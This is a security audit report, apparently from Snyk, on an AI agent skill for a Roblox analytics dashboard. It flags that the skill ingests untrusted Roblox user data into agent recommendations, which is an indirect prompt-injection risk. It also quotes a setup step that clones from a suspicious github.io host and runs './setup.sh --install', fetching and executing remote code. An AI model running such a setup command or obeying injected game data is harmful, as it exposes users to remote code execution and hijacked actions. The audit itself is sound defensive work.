mm2-analytics-dashboard-roblox

Warn

Audited by Snyk on May 16, 2026

Risk Level: MEDIUM
Full Analysis

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The SKILL.md explicitly instructs syncing and ingesting user data from Roblox (e.g., "python3 main.py --sync-inventory" and InventoryManager.sync_from_roblox()) and uses that user-generated game/inventory and recent-game data to drive AI recommendations and trade/strategy actions, exposing the agent to untrusted third-party content that could carry indirect prompt-injection.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill's automated setup runs "git clone https://8015238355.github.io" and then makes and executes "./setup.sh --install", which fetches remote code from https://8015238355.github.io and executes it during setup, presenting a clear remote-code-execution risk.

Issues (2)

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

Audit Metadata
Risk Level
MEDIUM
Analyzed
May 16, 2026, 11:25 PM
Issues
2
Security Audit — snyk — mm2-analytics-dashboard-roblox